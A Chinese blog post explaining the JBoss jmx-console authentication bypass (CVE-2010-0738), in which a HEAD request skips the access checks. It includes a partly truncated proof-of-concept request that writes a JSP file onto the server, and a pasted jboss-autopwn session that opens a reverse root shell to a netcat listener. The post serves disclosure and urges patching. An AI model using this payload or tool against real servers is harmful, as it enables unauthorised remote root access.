Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1181024
  • 博文数量: 272
  • 博客积分: 3899
  • 博客等级: 中校
  • 技术积分: 4734
  • 用 户 组: 普通用户
  • 注册时间: 2012-06-15 14:53
文章分类

全部博文(272)

文章存档

2012年(272)

分类: Delphi

2012-06-27 11:11:32

刚休假回来,就看到JBOSS爆出的这个漏洞,不过redhat官方已经patch了。很奇怪国内没人关注?

Redhat bugzilla上看到是316号报告的,427号订正

 
实际上讲的是一个JBoss 的认证绕过漏洞,分析和POC在这里:


Good Bye Critical Jboss 0day

需要***

简单来说,就是因为JBOSS在配置HTTP verbs的时候,访问控制的实现有问题,导致如 HEAD等未在配置文件中允许的verb能够直接以 jbossadmin 身份调用 GET handler, 从而绕过认证。

POC
如下:

HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1

Blackhat 2010 Europe 上发布的工具 jboss-autopwn,已经能够直接支持这个漏洞的调用了。

有人回帖给出了如下贴图:
[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]# 

这个漏洞非常严重,因为是默认配置就存在的,受影响的版本建议自查一下。

阅读(7375) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~